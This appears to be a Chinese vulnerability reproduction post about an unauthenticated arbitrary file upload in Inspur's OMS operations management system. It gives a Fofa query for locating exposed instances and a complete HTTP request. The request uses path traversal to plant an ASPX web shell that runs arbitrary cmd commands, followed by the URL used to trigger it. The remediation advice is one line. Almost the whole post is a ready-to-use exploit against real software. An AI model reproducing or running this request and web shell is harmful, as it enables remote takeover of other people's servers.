0x01 漏洞描述:
浪潮OMS运营管理系统 uploadlistfile 接口处存在任意文件上传漏洞,未经身份验证的远程攻击者可利用该漏洞获取服务器权限。
0x02 搜索语句:
Fofa:body="/cwbase/web/gsprtf/"
0x03 漏洞复现:
POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: /
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye
-----------------------------rww5upkbw6ctf0tu5hye
Content-Disposition: form-data; name="file"; filename="../../../../../../test.aspx"
Content-Type: image/png
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
-----------------------------rww5upkbw6ctf0tu5hye--
拼接上传后缀访问
http://your-ip/cwbase/test.aspx?cmd=whoami
0x04 修复建议:
关闭互联网暴露面或接口设置访问权限
160
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
